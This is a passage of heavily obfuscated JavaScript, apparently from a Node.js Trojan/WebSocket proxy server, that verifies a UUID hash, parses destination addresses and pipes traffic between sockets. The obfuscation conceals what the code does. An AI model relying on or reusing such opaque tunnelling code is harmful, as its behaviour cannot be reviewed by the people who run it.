_0x2207b4(_0x17183c,_0x2e0d82-_0x3bd302._0x34f270,_0x2ffa6a-_0x3bd302._0x2e6402,_0x4105b2-_0x3bd302._0x21fd23);}_0x214bae['on'](_0x1aab6b[_0x34b06d(_0x5260ac._0x5ad32c,_0x5260ac._0x518bac,_0x5260ac._0x22be12,0x22)],()=>{})['pipe'](this)['on'](_0x1aab6b[_0x34b06d(0x54,-_0x5260ac._0x8d7789,_0x5260ac._0x1daf10,_0x5260ac._0x35969e)],()=>{})[_0x34b06d(-_0x5260ac._0x265ac7,0x1a,-_0x5260ac._0x569829,0xa4)](_0x214bae);})['on'](_0x232852[_0x2207b4(-0xac,-_0x43561a._0x31e92b,-_0x43561a._0x5701db,-_0x43561a._0x31dd67)],()=>{});})[_0x1c0903(-_0x510446._0x6728ee,_0x510446._0x378d32,-_0x510446._0x44beff,-_0x510446._0x220214)](_0x18fa7f=>{const _0x5bb0f9={_0x16d501:0x41,_0x1d3573:0x37,_0x54fdd7:0x1,_0xf7434b:0x44,_0x2401af:0xe,_0x12248e:0x4b,_0x35ed41:0x2e,_0x24d6b4:0x106,_0x30e8db:0x65},_0x5bec6b={_0x852bea:0x77,_0x231f85:0x4c5,_0x2082f6:0x45},_0x5038d1={_0x974544:0xd2,_0x18ed0c:0xba,_0x5c8923:0x168};function _0x544c2c(_0x4ac117,_0x510b34,_0x4b6820,_0x1dd760){return _0x1c0903(_0x4ac117-_0x5038d1._0x974544,_0x510b34-_0x5038d1._0x18ed0c,_0x1dd760,_0x510b34-_0x5038d1._0x5c8923);}const _0x363e66={};_0x363e66[_0x3d354c(_0x15d39c._0xd5db2a,_0x15d39c._0x1579e1,_0x15d39c._0x2e44ca,_0x15d39c._0x2643bd)]=_0x232852['XxLMu'];const _0x14ac1c=_0x363e66,_0x42f999={};_0x42f999[_0x3d354c(0x332,_0x15d39c._0x483f3d,0x3c6,_0x15d39c._0x547aba)]=_0x4054da;function _0x3d354c(_0x2595cf,_0x5dbc5c,_0x4631af,_0x8828bd){return _0x1c0903(_0x2595cf-0x13d,_0x5dbc5c-_0x411617._0x3110ea,_0x5dbc5c,_0x8828bd-0x42c);}_0x42f999['port']=_0x234ae1,net[_0x3d354c(0x3d7,_0x15d39c._0x220cef,_0x15d39c._0x5bbdfd,0x40d)](_0x42f999,function(){const _0x316310={_0x2fe767:0xed,_0x475119:0x30};this['write'](_0x87e439[_0x2163ef(_0x5bb0f9._0x16d501,-_0x5bb0f9._0x1d3573,-0x7e,_0x5bb0f9._0x54fdd7)](_0x8300aa));function _0x2163ef(_0x2b77c3,_0x3cd6fb,_0x468239,_0x29aff2){return _0x544c2c(_0x2b77c3-0x1ac,_0x29aff2- -_0x316310._0x2fe767,_0x468239-_0x316310._0x475119,_0x468239);}function _0x150e38(_0x4ae7e6,_0x524b0a,_0x26e4f1,_0x16e019){return _0x544c2c(_0x4ae7e6-_0x5bec6b._0x852bea,_0x16e019-_0x5bec6b._0x231f85,_0x26e4f1-_0x5bec6b._0x2082f6,_0x4ae7e6);}_0x214bae['on'](_0x14ac1c[_0x2163ef(-_0x5bb0f9._0xf7434b,_0x5bb0f9._0x2401af,0x22,_0x5bb0f9._0x12248e)],()=>{})[_0x2163ef(-0x106,-_0x5bb0f9._0x35ed41,-_0x5bb0f9._0x24d6b4,-_0x5bb0f9._0x30e8db)](this)['on'](_0x14ac1c['KZuVD'],()=>{})['pipe'](_0x214bae);})['on']('error',()=>{});}),!![];}function handleTrojanConnection(_0x47b1fc,_0x44e0ab){const _0x18f137={_0xb208f4:0x407,_0x558d33:0x3b7,_0x28b567:0x3e4,_0x4dbad3:0x9e,_0x59f80d:0x9,_0x58cf57:0x9f,_0x32f7a3:0x9,_0x35123d:0x10,_0x46d776:0x14d,_0x437f1a:0x90,_0x4e8cba:0x11c,_0xcffa1a:0xaf,_0x5309f0:0x4a,_0x3c9562:0x17,_0x467ead:0x6f,_0x2fe5bb:0x63,_0x5e052e:0xc,_0x1c18d1:0x8a,_0xff8716:0x16b,_0x264e9c:0x195,_0x1b9af4:0x117,_0xfc89e6:0x1e,_0x5c511c:0x8e,_0x5f146b:0xdc,_0x13db68:0x5c,_0x209d80:0x50,_0x12cfc9:0x43,_0x2dae98:0x10,_0x5b9618:0x6,_0x148873:0x3ed,_0x4f3f21:0x3ab,_0x679b8:0x403,_0x3c3ce3:0x15d,_0x5cc2f8:0xa2,_0x954694:0xd4,_0x380b38:0x7,_0x2ad42c:0x12,_0xe16521:0x84,_0xf8a1ac:0x4b0,_0x566163:0x4a4,_0x3e141d:0x48a,_0x416e3f:0x3ef,_0x1c1307:0x3f7,_0x4cb375:0x439,_0x1c62ce:0x494,_0x2da59e:0x473,_0x1be7e0:0x49c,_0x4ef934:0x45d,_0x534d03:0x96,_0x169efd:0x63,_0x30da66:0xc0,_0x14b6a7:0x4ee,_0x1595d5:0x4e4,_0x266d0a:0x18,_0x38d0ad:0xd5,_0x812203:0x62,_0x3dd9b8:0xc1,_0x2d3d1c:0x441,_0x2dac57:0x4f5,_0x356174:0x4a8,_0x51168c:0x46d,_0x43ce18:0x52a,_0x230fd2:0x4bb,_0x1360de:0x522,_0x358f06:0x444,_0xd67818:0x48d,_0x484e88:0x40f,_0x1e8457:0x45d,_0x3def86:0x92,_0xe3aad5:0x58,_0x59e3be:0x67,_0xae8156:0x4d,_0x59a5ce:0x3cc,_0x94809e:0x3ec,_0x152ba5:0x381,_0x1cb250:0x434,_0x3d84c1:0x4f1,_0x201aa0:0x4a0,_0x529397:0x536,_0x43214b:0x461,_0xe509c3:0x35,_0x3c1217:0xe4,_0x32e640:0x94,_0x2a225d:0x173,_0x2e8fdc:0x7c,_0x498858:0xee,_0x536f59:0x517,_0x2e1284:0x4d2,_0x515881:0x426,_0xa5205:0x30,_0x3e1866:0x104,_0x3b0db5:0x42,_0x20d600:0x5b,_0x4a05c3:0x4ac,_0x1e75f2:0x497,_0x5935d7:0x375,_0x1ea9ef:0x398,_0x23b12d:0x3a1,_0x4b4b77:0x43b,_0x4caa69:0x3bd,_0x2b997e:0x39f,_0x40130f:0x3b,_0x303059:0xdf,_0xd2651c:0xe,_0x38f249:0x51,_0x14fef8:0x36,_0x3077b5:0x4b,_0x46119d:0x35a,_0x27e786:0x33d,_0x241d72:0x4eb,_0x557db4:0x484,_0x45159e:0x43f,_0x49321f:0x444,_0x5628c6:0xa4,_0x21a320:0x134,_0x124d58:0xb1,_0x11dae5:0x5c,_0x4b58ca:0x12e,_0x40f585:0x88,_0x18f0e3:0xc3,_0x33c131:0xcc,_0x199e60:0xb8,_0x1cce79:0x67,_0x377b6e:0x42,_0x405998:0x141,_0x6b8952:0x43e,_0x3a6a55:0x4bc,_0x31f9fc:0x547,_0x1c2eb0:0x4fc,_0x2a9b16:0x404,_0x1fe819:0x41f,_0x16ad07:0x9c,_0x25eaee:0x4a5,_0x1898f9:0x506,_0x3b7a15:0x456,_0x4bc226:0x13,_0x392397:0xa8,_0x20e5f9:0x95,_0x3e9cc1:0x4b0,_0x34bda3:0x51c,_0x40abbb:0x4d3,_0x206b95:0x156,_0x23fef7:0x10,_0x440ce3:0xbf,_0x17d78f:0x427,_0x4fe011:0x3c2,_0x2ca7b9:0x34e,_0x486d18:0x3df,_0x2936b4:0x3fb,_0x527d8a:0x37e,_0x11be49:0x4bf,_0x52d69a:0x4bc,_0x1af3be:0x51c,_0x264764:0x4a1,_0x41fad7:0x4f0,_0x508984:0x4c8,_0x739dda:0x70,_0x4f5a0b:0x2c,_0x40d6a5:0x4e,_0x15b753:0x2c,_0x31fc98:0x22,_0x541909:0x87,_0x16afaa:0x2c,_0x53e5bf:0x117,_0x36848f:0x68,_0x562e9b:0x146,_0x30d1da:0xe8,_0x56e487:0x4f9,_0x70e718:0x4e4,_0x4364cf:0x4b9,_0x212fbd:0x578,_0x2355e8:0x382,_0x27d933:0x584,_0x325796:0x4d5,_0x31b317:0x502,_0x147f8d:0x450,_0x32511a:0x442,_0x17dd55:0x493,_0x3e865a:0x4b4,_0x3228fa:0x524,_0x3073b9:0xcb,_0x26396b:0x6e,_0x1f4750:0x91,_0x5e7d53:0x343,_0x478c43:0x3a8,_0x210023:0x442,_0x5f0cec:0x335,_0x5b0b1d:0x3c7,_0x251c6a:0x436,_0x446595:0x55c,_0x364ab0:0x459,_0x1496cc:0x4d8,_0x288347:0x467,_0x596fe3:0x41b,_0xc8e6ad:0x8b,_0x5b67d8:0x2a,_0x425d8c:0x2,_0x49b881:0x52,_0x2619e3:0x34,_0x4cc4d5:0xcf,_0x3a457a:0x3f2,_0x3109cc:0x468,_0xd6e977:0x46e,_0x2b07a3:0x400,_0x4e7e70:0x471,_0x4a8b4d:0x4d9,_0x2348d5:0x17a,_0x5a4f7c:0x98,_0x35fff6:0x101,_0x4822b2:0x4cb,_0x3a2d24:0x525,_0x5a3795:0x165,_0x2f9e53:0x12c,_0x585d54:0xf9,_0x490701:0x4c7,_0xd97135:0x4f1,_0x32f561:0x542,_0x4118a5:0x171,_0x141ba0:0x83,_0xe7f248:0xc4,_0x295ff2:0xd3,_0x58856e:0x3b5,_0x4743a2:0x433},_0x3a8512={_0x45ca0e:0x20e,_0x386173:0x195,_0x3bc1d7:0x1f3,_0x2bd06c:0x118,_0x4f00f7:0x16d,_0x5c1ed2:0x11e,_0x44c349:0x3ac,_0x7adcdf:0x356,_0x8a1ed:0x326},_0x5d5e12={_0x6fcc17:0x4d3,_0x2456eb:0x618,_0xa2b9c0:0x56d},_0x9da135={_0x227f44:0x20,_0x2eda3e:0x93,_0x3b1a96:0x74},_0x47b0a6={_0x41ff68:0xd3},_0x232351={_0x12b009:0x1e2,_0x4368d5:0x54,_0x17af85:0x120},_0x3b73bb={_0x83ea86:0x46e,_0xb156b0:0x537,_0x4c3a52:0x507,_0x84efd5:0x598,_0x2723bf:0x564,_0x28dc2b:0x690,_0x387b90:0x5e0,_0x23989a:0x621,_0x1e8fde:0x629,_0x1be9d3:0x40e,_0x44d60c:0x499,_0x5862e4:0x4ed,_0x5c0fb7:0x512,_0x825f62:0x5ed,_0x55ecba:0x55a,_0x1a72ab:0x5a1,_0x5590d7:0x599,_0x9d12f:0x6a1,_0x581cdc:0x620,_0x5942a1:0x5c5,_0x178bbe:0x601,_0x362030:0x5e0,_0xf10eb8:0x651,_0x1d843d:0x5fe,_0x1bca64:0x57b,_0x2df8e5:0x68c,_0x1e973d:0x5f1,_0x523702:0x580,_0x460954:0x5c2,_0x2ac54d:0x560,_0x180f79:0x611,_0x48e230:0x612,_0x130f7a:0x60a,_0xcf70e2:0x5ff},_0x57caaa={_0x18039b:0xd8,_0x346f8b:0xde},_0x382c21={_0x42ef49:0x74,_0x3bc009:0x1b3},_0x50248d={_0x765e34:0xab};function _0x4a9935(_0x454c3f,_0x493e4f,_0x268db3,_0x27af2a){return _0x279f0a(_0x454c3f,_0x493e4f-_0x50248d._0x765e34,_0x27af2a-0x190,_0x27af2a-0x13d);}const _0x4af7b8={'GxZfd':_0x240500(_0x18f137._0xb208f4,0x455,_0x18f137._0x558d33,_0x18f137._0x28b567),'GJTQQ':'config.yaml','DencA':function(_0x55e9ab,_0x4e35ea,_0x6bfebe){return _0x55e9ab(_0x4e35ea,_0x6bfebe);},'ePpun':'error','MDAfM':function(_0x286abf){return _0x286abf();},'QMqbl':function(_0x2f9d7f,_0xee9262,_0x2fbd5b){return _0x2f9d7f(_0xee9262,_0x2fbd5b);},'DmxDf':function(_0x38dc10){return _0x38dc10();},'kwbzw':_0x4a9935(-_0x18f137._0x4dbad3,_0x18f137._0x59f80d,_0x18f137._0x58cf57,_0x18f137._0x32f7a3),'jjRPf':'apJHR','IWJEW':function(_0x465a74,_0x329aea){return _0x465a74===_0x329aea;},'FlKPX':function(_0x346e83,_0x3ad21c){return _0x346e83>_0x3ad21c;},'UmcGl':function(_0x485ded,_0x303d1e){return _0x485ded(_0x303d1e);},'iWYuz':function(_0x96f8e3){return _0x96f8e3();},'BCpjg':_0x4a9935(-_0x18f137._0x35123d,-0x5d,0x8e,0x5),'BuGYX':function(_0x57a40d,_0x4db630){return _0x57a40d<_0x4db630;},'QNvcl':function(_0x4cf882,_0x3344a8){return _0x4cf882!==_0x3344a8;},'RUYdE':_0x4a9935(_0x18f137._0x46d776,_0x18f137._0x437f1a,_0x18f137._0x4e8cba,_0x18f137._0xcffa1a),'fTYMs':_0x4a9935(0xef,0x78,-0x50,_0x18f137._0x5309f0),'zWyrc':function(_0xb6c47c,_0x41377a){return _0xb6c47c===_0x41377a;},'xtIJh':function(_0x4b7d98,_0x2f2eac){return _0x4b7d98+_0x2f2eac;},'abYEZ':_0x4a9935(-_0x18f137._0x3c9562,-_0x18f137._0x467ead,_0x18f137._0x2fe5bb,-_0x18f137._0x5e052e),'MNPiu':function(_0x5d6c1f,_0x2d8620){return _0x5d6c1f!==_0x2d8620;},'kmlxz':_0x4a9935(_0x18f137._0x1c18d1,_0x18f137._0xff8716,_0x18f137._0x264e9c,_0x18f137._0x1b9af4),'ZIjeU':function(_0x4c0b10,_0x24e8eb){return _0x4c0b10===_0x24e8eb;},'PccEq':_0x4a9935(_0x18f137._0xfc89e6,0x5e,-0x63,-0x4),'gGpZa':function(_0x13df32,_0x4451cf){return _0x13df32===_0x4451cf;},'IIlwm':function(_0x5dc7d2,_0x47c614){return _0x5dc7d2!==_0x47c614;},'mDpeq':_0x4a9935(-_0x18f137._0x5c511c,-_0x18f137._0x5f146b,-_0x18f137._0x13db68,-_0x18f137._0x209d80),'lgUpG':function(_0x2e1476,_0x32deb9){return _0x2e1476(_0x32deb9);},'fgZwK':function(_0x39dee5,_0x1c546d){return _0x39dee5(_0x1c546d);},'ybelG':function(_0x1b8115,_0xd87326){return _0x1b8115!==_0xd87326;},'RwCKn':_0x4a9935(_0x18f137._0x4dbad3,_0x18f137._0x12cfc9,-_0x18f137._0x2dae98,_0x18f137._0x5b9618)};function _0x240500(_0x553346,_0xb1976a,_0x49c6ea,_0x428dbc){return _0x279f0a(_0x49c6ea,_0xb1976a-_0x382c21._0x42ef49,_0xb1976a-0x588,_0x428dbc-_0x382c21._0x3bc009);}try{if(_0x4af7b8[_0x240500(_0x18f137._0x148873,_0x18f137._0x4f3f21,0x321,_0x18f137._0x679b8)](_0x4af7b8[_0x4a9935(_0x18f137._0x3c3ce3,_0x18f137._0x5cc2f8,_0x18f137._0x954694,0x103)],_0x4a9935(-_0x18f137._0x380b38,-_0x18f137._0x59f80d,-_0x18f137._0x2ad42c,_0x18f137._0xe16521))){if(_0x4af7b8[_0x240500(_0x18f137._0xf8a1ac,0x44b,_0x18f137._0x566163,_0x18f137._0x3e141d)](_0x44e0ab[_0x240500(_0x18f137._0x416e3f,_0x18f137._0x1c1307,0x352,_0x18f137._0x4cb375)],0x17*0x199+0x1c34+-0x40b9))return![];const _0x1b54e8=_0x44e0ab['slice'](0x238c+-0x3*0x991+-0x6d9,-0xec3+-0x5b7+0x14b2)[_0x240500(_0x18f137._0x1c62ce,0x434,_0x18f137._0x2da59e,0x429)](),_0x189b58=[UUID];let _0xfa10c0=null;for(const _0x2ac7d0 of _0x189b58){const _0x20f20f=crypto[_0x240500(0x536,_0x18f137._0x1be7e0,_0x18f137._0x4ef934,0x42b)](_0x4af7b8[_0x4a9935(0x150,_0x18f137._0x534d03,_0x18f137._0x169efd,_0x18f137._0x30da66)])[_0x240500(0x3c2,0x446,_0x18f137._0x14b6a7,_0x18f137._0x1595d5)](_0x2ac7d0)[_0x4a9935(_0x18f137._0x266d0a,_0x18f137._0x38d0ad,_0x18f137._0x812203,_0x18f137._0x3dd9b8)](_0x240500(_0x18f137._0x2d3d1c,_0x18f137._0x2dac57,_0x18f137._0x356174,_0x18f137._0x51168c));if(_0x20f20f===_0x1b54e8){_0xfa10c0=_0x2ac7d0;break;}}if(!_0xfa10c0)return![];let _0x37f3eb=0xb19+-0x4a*0x55+0xdb1;if(_0x4af7b8[_0x240500(_0x18f137._0x43ce18,_0x18f137._0x230fd2,_0x18f137._0x1360de,_0x18f137._0x358f06)](_0x44e0ab[_0x37f3eb],0x5f*0x16+0x22e*-0x9+-0x9b*-0x13)&&_0x4af7b8[_0x240500(0x504,_0x18f137._0xd67818,_0x18f137._0x484e88,_0x18f137._0x1e8457)](_0x44e0ab[_0x4af7b8[_0x4a9935(_0x18f137._0x209d80,0x21,0x132,0xbf)](_0x37f3eb,0x126*0x3+-0x143*0xb+0xa70)],0x2*0x3a5+0x1db6+-0x24f6)){if(_0x4af7b8[_0x4a9935(-_0x18f137._0x3def86,_0x18f137._0xe3aad5,-_0x18f137._0x59e3be,-_0x18f137._0xae8156)](_0x240500(_0x18f137._0x59a5ce,_0x18f137._0x94809e,_0x18f137._0x152ba5,_0x18f137._0x1cb250),_0x4af7b8[_0x240500(_0x18f137._0x3d84c1,_0x18f137._0x201aa0,_0x18f137._0x529397,_0x18f137._0x43214b)])){const _0x21f367=_0xe499ce[_0x4a9935(_0x18f137._0xe509c3,_0x18f137._0x3c1217,_0x18f137._0x32e640,0x5b)](':')?_0x43eed2[_0x4a9935(_0x18f137._0x2a225d,0x1a3,_0x18f137._0x2e8fdc,_0x18f137._0x498858)](':')[_0x240500(_0x18f137._0x536f59,_0x18f137._0x2e1284,_0x18f137._0x515881,0x552)]():'',_0x45273b=_0x56f1a3[_0x4a9935(_0x18f137._0xa5205,_0x18f137._0x3e1866,_0x18f137._0x3b0db5,_0x18f137._0x20d600)](_0x21f367)?_0x4af7b8[_0x240500(0x45a,_0x18f137._0x4a05c3,0x3f8,_0x18f137._0x1e75f2)]:_0x240500(_0x18f137._0x5935d7,0x3b5,_0x18f137._0x1ea9ef,_0x18f137._0x23b12d),_0x31cf3a='client_secret:\x20'+_0x4ef151+_0x240500(_0x18f137._0x4b4b77,_0x18f137._0x4caa69,_0x18f137._0x2b997e,0x455)+_0x48d927+_0x4a9935(_0x18f137._0x40130f,-_0x18f137._0x303059,_0x18f137._0xd2651c,-_0x18f137._0x38f249)+_0x45273b+_0x4a9935(_0x18f137._0x20d600,-0xa2,-_0x18f137._0x14fef8,-_0x18f137._0x3077b5)+_0x37ef72;_0x43c699[_0x240500(_0x18f137._0x46119d,0x3ef,_0x18f137._0x148873,_0x18f137._0x27e786)](_0x4af7b8[_0x240500(_0x18f137._0x241d72,_0x18f137._0x557db4,_0x18f137._0x45159e,_0x18f137._0x49321f)],_0x31cf3a);}else _0x37f3eb+=-0x805+-0x183+0x6*0x197;}const _0x5e3fff=_0x44e0ab[_0x37f3eb];if(_0x4af7b8[_0x4a9935(_0x18f137._0x5628c6,0xc2,_0x18f137._0x21a320,_0x18f137._0x124d58)](_0x5e3fff,-0x23*-0xc3+-0x17*0x41+-0x14d1))return![];_0x37f3eb+=0xc7a*-0x3+0x71*0x33+0xeec;const _0x38ba47=_0x44e0ab[_0x37f3eb];_0x37f3eb+=-0x9*-0x437+0x15b7+-0x1*0x3ba5;let _0x5db5e7,_0x3ad347;if(_0x4af7b8[_0x4a9935(_0x18f137._0x11dae5,_0x18f137._0x4b58ca,_0x18f137._0x40f585,_0x18f137._0x18f0e3)](_0x38ba47,-0x1aa3+0x1aa+0x18fa))_0x5db5e7=_0x44e0ab[_0x4a9935(0x136,_0x18f137._0x33c131,0x32,_0x18f137._0x199e60)](_0x37f3eb,_0x4af7b8[_0x4a9935(_0x18f137._0x1cce79,_0x18f137._0x377b6e,_0x18f137._0x405998,0xbf)](_0x37f3eb,-0x1*0x1e55+0x153f+-0xa*-0xe9))[_0x240500(_0x18f137._0x6b8952,_0x18f137._0x3a6a55,_0x18f137._0x31f9fc,_0x18f137._0x1c2eb0)]('.'),_0x37f3eb+=-0x2*0xc0b+0x1*0x135b+0x1b*0x2d;else{if(_0x38ba47===0x1471*0x1+0x23a9+-0xad*0x53){if(_0x4af7b8[_0x240500(_0x18f137._0x2a9b16,_0x18f137._0x1fe819,0x40a,0x3c8)]===_0x4af7b8[_0x4a9935(_0x18f137._0x16ad07,0x54,_0x18f137._0x58cf57,0x27)]){const _0xff7558=_0x44e0ab[_0x37f3eb];_0x37f3eb+=0x2139+0x1744+-0x387c,_0x5db5e7=_0x44e0ab[_0x240500(_0x18f137._0x25eaee,_0x18f137._0xf8a1ac,_0x18f137._0x1898f9,_0x18f137._0x3b7a15)](_0x37f3eb,_0x37f3eb+_0xff7558)['toString'](),_0x37f3eb+=_0xff7558;}else{if(_0xe3fdcf){const _0x30038d=_0x23a84f['apply'](_0x4e0180,arguments);return _0x1530ac=null,_0x30038d;}}}else{if(_0x4af7b8[_0x4a9935(0xe5,_0x18f137._0x4bc226,_0x18f137._0x392397,_0x18f137._0x20e5f9)](_0x38ba47,0x45a*0x3+0x3e*0x2c+-0x7e6*0x3))_0x5db5e7=_0x44e0ab[_0x240500(0x538,_0x18f137._0x3e9cc1,_0x18f137._0x34bda3,_0x18f137._0x40abbb)](_0x37f3eb,_0x4af7b8[_0x4a9935(_0x18f137._0x206b95,_0x18f137._0x23fef7,0x3a,_0x18f137._0x440ce3)](_0x37f3eb,0x19f*-0x13+-0x243d*-0x1+-0x560))[_0x240500(_0x18f137._0x17d78f,_0x18f137._0x4fe011,0x374,_0x18f137._0x2ca7b9)]((_0x354637,_0x1fc27a,_0x36c6bc,_0x28abb5)=>_0x36c6bc%(0x2*-0x7f1+-0x27*-0xca+0x5*-0x2fa)?_0x354637['concat'](_0x28abb5[_0x240500(0x48c,0x4b0,0x42b,0x4c8)](_0x36c6bc-(0x52*0x58+0x1a85+-0x6*0x91e),_0x36c6bc+(-0x16e7+-0x2332*0x1+0x3a1a*0x1))):_0x354637,[])[_0x240500(0x355,_0x18f137._0x486d18,_0x18f137._0x2936b4,_0x18f137._0x527d8a)](_0x53e54f=>_0x53e54f['readUInt16BE'](0x159f+0x12*-0x184+0x5a9)['toString'](0x78a+0x25b0+-0x2d2a))[_0x240500(_0x18f137._0x11be49,_0x18f137._0x52d69a,_0x18f137._0x1af3be,_0x18f137._0x264764)](':'),_0x37f3eb+=0x1*-0x1721+0xf66+0x7cb;else{if(_0x4af7b8[_0x240500(_0x18f137._0x41fad7,_0x18f137._0x508984,0x444,0x4e5)](_0x4af7b8[_0x4a9935(-_0x18f137._0x739dda,-_0x18f137._0x4f5a0b,_0x18f137._0x40d6a5,_0x18f137._0x15b753)],_0x4af7b8[_0x4a9935(-0x55,_0x18f137._0x31fc98,-_0x18f137._0x541909,_0x18f137._0x16afaa)]))return![];else{!_0x4af7b8[_0x4a9935(_0x18f137._0x53e5bf,_0x18f137._0x36848f,_0x18f137._0x562e9b,_0x18f137._0x30d1da)](_0x27e07e,_0x1eb014,_0x2e09e9)&&_0x47296c[_0x240500(0x4d5,_0x18f137._0x56e487,0x571,_0x18f137._0x40abbb)]();return;}}}}_0x3ad347=_0x44e0ab[_0x240500(_0x18f137._0x70e718,_0x18f137._0x70e718,_0x18f137._0x4364cf,_0x18f137._0x212fbd)](_0x37f3eb),_0x37f3eb+=-0xad3+-0xe4d+-0xc91*-0x2;_0x37f3eb<_0x44e0ab[_0x240500(0x400,_0x18f137._0x1c1307,0x3fc,_0x18f137._0x2355e8)]&&_0x4af7b8[_0x240500(_0x18f137._0x27d933,_0x18f137._0x325796,_0x18f137._0x31b317,_0x18f137._0x147f8d)](_0x44e0ab[_0x37f3eb],0x1a68+0x25cc+-0x4027)&&_0x44e0ab[_0x4af7b8[_0x240500(_0x18f137._0x32511a,0x4b7,_0x18f137._0x536f59,_0x18f137._0x17dd55)](_0x37f3eb,-0x817+-0x329*0x3+0x199*0xb)]===-0x7c+-0xdda+-0x14*-0xb8&&(_0x4af7b8[_0x240500(0x413,_0x18f137._0x3e865a,_0x18f137._0x3228fa,0x4b2)](_0x4af7b8[_0x4a9935(_0x18f137._0x3073b9,0x20,_0x18f137._0x26396b,_0x18f137._0x1f4750)],_0x240500(_0x18f137._0x5e7d53,_0x18f137._0x478c43,_0x18f137._0x210023,_0x18f137._0x5f0cec))?(this[_0x240500(0x3db,0x407,0x444,_0x18f137._0x5b0b1d)](_0x1949d7[_0x240500(_0x18f137._0x251c6a,_0x18f137._0x3e9cc1,_0x18f137._0x446595,_0x18f137._0x364ab0)](_0x31bfa8)),_0x1b47f4['on'](_0x4af7b8[_0x240500(_0x18f137._0x1496cc,_0x18f137._0x288347,0x46c,_0x18f137._0x596fe3)],()=>{})[_0x4a9935(_0x18f137._0xc8e6ad,_0x18f137._0x4dbad3,0x81,0x52)](this)['on']('error',()=>{})[_0x4a9935(_0x18f137._0x5b67d8,_0x18f137._0x440ce3,-_0x18f137._0x425d8c,_0x18f137._0x49b881)](_0x16ca16)):_0x37f3eb+=-0x595*-0x3+-0xf*0x6f+-0xa3c);const _0x553d85=_0x4af7b8[_0x4a9935(_0x18f137._0x2619e3,0x108,_0x18f137._0x33c131,_0x18f137._0x4cc4d5)](createWebSocketStream,_0x47b1fc);return _0x4af7b8['fgZwK'](resolveHost,_0x5db5e7)[_0x240500(_0x18f137._0x3a457a,_0x18f137._0x3109cc,_0x18f137._0xd6e977,_0x18f137._0x2b07a3)](_0xa46dae=>{const _0xca0486={_0x1e8040:0x3e3,_0xea629d:0x344,_0x2eb8e8:0x3a9,_0x2c6eca:0x192,_0xaa34bc:0x10a,_0xcc1cb3:0xf0,_0x335bd0:0xd4,_0x31689d:0x148,_0x45fd52:0x387,_0x5b442c:0x3d1,_0x459e63:0xd4,_0x1bfb8e:0x43,_0xabab14:0xb8,_0x57f52e:0xd1,_0x96f87e:0x159,_0x2254d9:0xeb},_0x27d243={_0x34361e:0x32,_0x2ecc54:0xd0},_0x5c4ed8={_0x49f5c1:0xdd,_0x1f9bf4:0x193,_0x420d6f:0x50d},_0x440279={};function _0x3637df(_0xbc6bdb,_0x4bb9cc,_0x480a32,_0x3ebdf1){return _0x4a9935(_0x3ebdf1,_0x4bb9cc-_0x5c4ed8._0x49f5c1,_0x480a32-_0x5c4ed8._0x1f9bf4,_0x480a32-_0x5c4ed8._0x420d6f);}function _0x57b6b4(_0x221586,_0x16f38c,_0x1c41ee,_0x1a76b9){return _0x240500(_0x221586-_0x57caaa._0x18039b,_0x16f38c-_0x57caaa._0x346f8b,_0x221586,_0x1a76b9-0x111);}_0x440279[_0x3637df(_0x3b73bb._0x83ea86,_0x3b73bb._0xb156b0,_0x3b73bb._0x4c3a52,_0x3b73bb._0x84efd5)]=_0x3637df(_0x3b73bb._0x2723bf,_0x3b73bb._0x28dc2b,_0x3b73bb._0x387b90,_0x3b73bb._0x23989a);const _0x19fd2b=_0x440279;if(_0x4af7b8[_0x3637df(_0x3b73bb._0x1e8fde,0x59c,0x613,0x56c)]!==_0x4af7b8[_0x57b6b4(_0x3b73bb._0x1be9d3,_0x3b73bb._0x44d60c,_0x3b73bb._0x5862e4,_0x3b73bb._0x5c0fb7)]){const _0x5d0787={};_0x5d0787[_0x3637df(_0x3b73bb._0x825f62,0x5db,_0x3b73bb._0x55ecba,_0x3b73bb._0x1a72ab)]=_0xa46dae,_0x5d0787['port']=_0x3ad347,net[_0x3637df(_0x3b73bb._0x5590d7,_0x3b73bb._0x9d12f,_0x3b73bb._0x581cdc,0x5d4)](_0x5d0787,function(){const _0x22da82={_0x20b1b7:0x68,_0x449972:0x45,_0x148f61:0x433};function _0x5802e2(_0x3bf02b,_0x5f07d5,_0x599d3b,_0x1cdf0c){return _0x3637df(_0x3bf02b-_0x22da82._0x20b1b7,_0x5f07d5-_0x22da82._0x449972,_0x3bf02b- -_0x22da82._0x148f61,_0x1cdf0c);}function _0x18460e(_0x536ecc,_0x176903,_0x340ec5,_0x5a1f6d){return _0x3637df(_0x536ecc-_0x27d243._0x34361e,_0x176903-_0x27d243._0x2ecc54,_0x176903- -0x1d8,_0x340ec5);}_0x37f3eb<_0x44e0ab['length']&&this[_0x18460e(_0xca0486._0x1e8040,_0xca0486._0xea629d,_0xca0486._0x2eb8e8,0x2b4)](_0x44e0ab[_0x5802e2(_0xca0486._0x2c6eca,_0xca0486._0xaa34bc,_0xca0486._0xcc1cb3,0x16d)](_0x37f3eb)),_0x553d85['on'](_0x19fd2b[_0x5802e2(_0xca0486._0x335bd0,0x152,_0xca0486._0x31689d,0xea)],()=>{})[_0x18460e(0x3ba,_0xca0486._0x45fd52,0x351,_0xca0486._0x5b442c)](this)['on'](_0x19fd2b[_0x5802e2(_0xca0486._0x459e63,_0xca0486._0x1bfb8e,_0xca0486._0xabab14,_0xca0486._0x57f52e)],()=>{})[_0x5802e2(0x12c,_0xca0486._0x96f87e,_0xca0486._0x2254d9,0x1a6)](_0x553d85);})['on'](_0x3637df(_0x3b73bb._0x5942a1,_0x3b73bb._0x178bbe,_0x3b73bb._0x362030,0x664),()=>{});}else{const _0x26daaa={_0x4c1774:0xce,_0x749125:0x6f},_0x50acf1={_0x1273f5:0x78,_0x5e5d74:0xaf,_0xe9d782:0x54c},_0x351ee5={'tSUgi':function(_0x1e3550){return _0x4af7b8['MDAfM'](_0x1e3550);}};_0x4af7b8[_0x3637df(_0x3b73bb._0xf10eb8,_0x3b73bb._0x1d843d,0x61d,_0x3b73bb._0x1bca64)](_0x5227cd),_0x4af7b8[_0x3637df(0x66c,_0x3b73bb._0x2df8e5,_0x3b73bb._0x1e973d,_0x3b73bb._0x523702)](_0xd1b944,()=>{function _0x2a0a8c(_0x3fbab0,_0x1dcc6a,_0x4e9c6f,_0x33590d){return _0x3637df(_0x3fbab0-_0x50acf1._0x1273f5,_0x1dcc6a-_0x50acf1._0x5e5d74,_0x33590d- 